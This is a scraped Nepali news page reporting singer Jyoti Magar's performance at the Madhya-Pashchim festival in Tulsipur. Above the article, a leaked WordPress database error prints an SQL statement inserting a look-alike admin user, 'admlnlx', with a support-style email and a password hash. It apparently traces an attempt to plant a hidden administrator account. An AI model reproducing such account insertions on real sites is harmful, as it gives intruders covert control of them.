WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BdmQXgkAhLAyR1iqe/1oT9HKp1hi/V/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 20:16:02', '', 'admlnlx', 'admlnlx')
तुलसीपुर, माघ २१-
तुलसीपुरमा जारी मध्यपश्चिम महोत्सवमा गायिका ज्योति मगरले शुक्रवार हंगामा मच्चाएकी छन् ।
महोत्सवको नवौं दिनमा उनी महोत्सवमा आएकी हुन । उनी स्टेजमा प्रवेश गरेदेखि नै दर्शकले चर्काे हुटिङ गरेका थिए । उनले मिनी स्कट र ज्याकेट लगाएर स्टेज छिरेकी ज्योतिले अन्त्य सम्ममा ज्याकेट मात्रै फुकाले पछि माहोलमा झनै हंगामा मच्चिएको थियो ।
अन्तिम प्रस्तुती सम्म उनको शरिरको माथिल्लो भागमा ब्रा मात्रै बचेको थियो । उनले उही मुलाको सिन्की उही मुलाको चाना, जिम्वाल वाउकी छोरी, पुस माघको जाडोमा सिरक ताना तान लगायतका गीत प्रस्तुत गरेकी थिइन ।






